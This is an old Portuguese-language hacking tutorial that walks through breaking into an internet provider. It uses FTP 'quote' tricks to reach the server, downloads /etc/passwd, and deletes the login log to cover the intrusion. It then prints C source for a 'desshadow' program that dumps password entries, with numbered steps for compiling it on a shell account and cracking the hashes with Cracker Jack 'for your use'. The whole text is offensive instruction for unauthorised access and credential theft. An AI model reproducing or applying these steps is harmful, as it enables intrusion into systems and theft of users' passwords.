Para invadir um provedor antigo, (digo antigo pois com um novo
 este método já não funciona mais.) você deve fazer o seguinte :


Abra o DOS e digite :    C:\>ftp vitima.com  [ Seguido de enter ] 



Em seguida digite :   quote user ftp ( seguido de enter ) 





Logo após digite :   quote cwd~root [ seguido de enter ] 


( Caso não funcione o "quote cwd~root" vá tentando uma série de senhas UNIX. ) 


( Ex. :  "quote cwd~sys"           "quote cwd~daemon"          "quote cwd~sysop" ...)   





Ao conectar-se ao sistema de FTP do provedor você precisará entrar no diretório etc. 





Para isso digite :    cd etc 





Depois procure a pasta "passwd" 





Depois digite :   get passwd 





Em seguida apague o arquivo .log que você foi logado lá ao entrar no provedor.  





Este comando passará para seu o núcleo de seu computador ( C:\> ) as senhas dos usuários deste provedor.  





Mas não adiantará nada mesmo isso porque as senhas ou estarão criptografadas ou com shadow. 





 Caso eles estejam criptografadas será difícil e demorado desencriptografa-las mas espere, vale a pena.
 

( Para desencriptografar use o programa Cracker Jack,procure em nossa parte de crackers)  


Agora as senhas que estiverem com shadow será mais difícil. Você terá que executar o desshadow
no server e ter uma conta shell do cara no provedor  para puxar o arquivo de passwd sem shadow
para depois desencriptografar.  





Abaixo o comando de "Desshadow" : 





struct  SHADOWPW { 


    char *pw_name; 


    char *pw_passwd; 


    int  pw_uid; 


    int  pw_gid; 


    int  pw_quota; 


    char *pw_comment; 


    char *pw_gecos; 


    char *pw_dir;

 
    char *pw_shell; 


};
 

 


struct passwd *getpwent(), *getpwuid(), *getpwnam();


    


#ifdef   elxsi


 


#define  SHADOWPW "/etc/shadowpw"


#define  SHADOWPW_PAG "/etc/shadowpw.pag"


#define  SHADOWPW_DIR "/etc/shadowpw.dir"


 


#define  CHANGE_TRIES 3


 


#define  PASSWD_PROG "/bin/passwd"


 


#define  EXEMPTPW "/etc/exemptpw"


#define MAX_EXEMPT 100


 


#define BSD_CRIT 0


#define STR_CRIT 1


#define MAX_CRIT 1


#endif   elxsi


#define NULL 0


main()


{


  struct passwd *p;


  int i;


  for (;1;) {


    p=getpwent();


    if (p==NULL) return;


    printpw(p);


  }


}


 


printpw(a)


struct SHADOWPW *a;


{


  printf("%s:%s:%d:%d:%s:%s:%s\n",


     a->pw_name,a->pw_passwd,a->pw_uid,a->pw_gid,


     a->pw_gecos,a->pw_dir,a->pw_shell);


}





O Comando de Desshadow é de Unix por isso precisa-se da conta shell.


Explicarei meu método de fazê-lo :





1º Consiga uma conta shell. ( Não posso lhe informar onde conseguir pois a que tinha não existe mais )





2º Pegue o comando de desshadow acima descrito já salvo como "shadow.c" .





3º Entre no server de sua conta shell por FTP.





4º Compile o comando de desshadow.





5º Execute ele e puxe o arquivo "passwd" do server que você irá pegar a senha.





6º Caso as senhas estejam criptografadas use o Cracker Jack e descriptográfeas.





7º Pronto ! Saindo uma boa senha fresquinha para seu uso !





8º Um conselho : Não saia por aí dizendo "Eu sou hacker ! Eu roubei as senhas daquele provedor..."

Eu não suporto gente que faz isso. Mas não é só por minha causa tal conselho. Ninguém gosta de gente assim. 

Ah outra coisa. Não zoe muito as senhas... O que a gente ganha prejudicando as pessoas ?